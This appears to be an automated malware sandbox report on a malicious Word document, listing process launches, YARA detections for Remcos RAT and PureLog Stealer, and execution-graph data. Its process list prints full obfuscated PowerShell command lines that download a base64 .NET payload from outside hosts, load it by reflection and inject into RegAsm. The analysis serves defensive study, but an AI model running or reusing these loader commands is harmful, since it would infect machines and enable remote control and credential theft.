                        Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                        2024-09-26 08:33:09 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                        Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                        2024-09-26 08:33:09 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                        Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                        2024-09-26 08:33:09 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                        Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                        2024-09-26 08:33:09 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                        Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                        2024-09-26 08:33:09 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                        Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                        2024-09-26 08:33:09 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                        Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:04:32:58
                        Start date:26/09/2024
                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x13fa30000
                        File size:1'423'704 bytes
                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:2
                        Start time:04:32:59
                        Start date:26/09/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:04:33:03
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
                        Imagebase:0x7e0000
                        File size:141'824 bytes
                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:04:33:04
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Imagebase:0x11d0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:04:33:05
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                        Imagebase:0x11d0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:04:33:12
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:11
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:14
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:15
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:16
                        Start time:04:33:22
                        Start date:26/09/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        General

                        Target ID:20
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:21
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:22
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:23
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 0012D006 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.385725982.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_12d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2091b79f7fb5b1d3f5f822ecd68e8be5788d40e77111e23f9dac3861139edf64
                          • Instruction ID: 7b57b3ce6fc4d2c926b1b4411e66c9d1c09d9a77d675cd825db78eb80700ff90
                          • Opcode Fuzzy Hash: 2091b79f7fb5b1d3f5f822ecd68e8be5788d40e77111e23f9dac3861139edf64
                          • Instruction Fuzzy Hash: 0D018C6140D3D09FD7124B25EC947A2BFA4DF43224F1984DBE8848F2A7C2689C49C772
                          Function 0012D01D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.385725982.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_12d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2bd890f622bfaa716a76d3ae9127d62defe085eec9f6185bcbe353b636db4d8e
                          • Instruction ID: 667d3f080c3f2c3b691af0a78b4b2a21bf88e9f809f8b8f479bb36c6fbb58e9f
                          • Opcode Fuzzy Hash: 2bd890f622bfaa716a76d3ae9127d62defe085eec9f6185bcbe353b636db4d8e
                          • Instruction Fuzzy Hash: 6801D471404350AAE7204E15F884B66BFD8DF41324F28841AFC444A2A6C7799845C6B5

                          Execution Graph

                          Execution Coverage:4.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:74
                          Total number of Limit Nodes:1
                          execution_graph 11857 1020aa8 11858 1020acf 11857->11858 11859 1020b9b 11858->11859 11871 1021dc3 11858->11871 11876 102107e 11858->11876 11881 102167e 11858->11881 11885 10211b8 11858->11885 11888 1020f75 11858->11888 11891 1020ec4 11858->11891 11895 10219b7 11858->11895 11900 10215c6 11858->11900 11904 1021551 11858->11904 11909 1021c30 11858->11909 11914 1021343 11858->11914 11872 1021dd4 11871->11872 11919 1020610 11872->11919 11923 1020605 11872->11923 11877 1021088 11876->11877 11927 1022980 11877->11927 11931 1022988 11877->11931 11878 1020d50 11882 1021688 11881->11882 11939 1020288 11882->11939 11887 1020288 WriteProcessMemory 11885->11887 11886 1020d50 11887->11886 11890 1020288 WriteProcessMemory 11888->11890 11889 1020fa9 11890->11889 11943 1022930 11891->11943 11948 1022928 11891->11948 11892 1020d50 11896 1020d50 11895->11896 11897 102107d 11895->11897 11898 1022980 ResumeThread 11897->11898 11899 1022988 ResumeThread 11897->11899 11898->11896 11899->11896 11901 10215d3 11900->11901 11903 1020288 WriteProcessMemory 11901->11903 11902 10216cb 11903->11902 11905 1020ec3 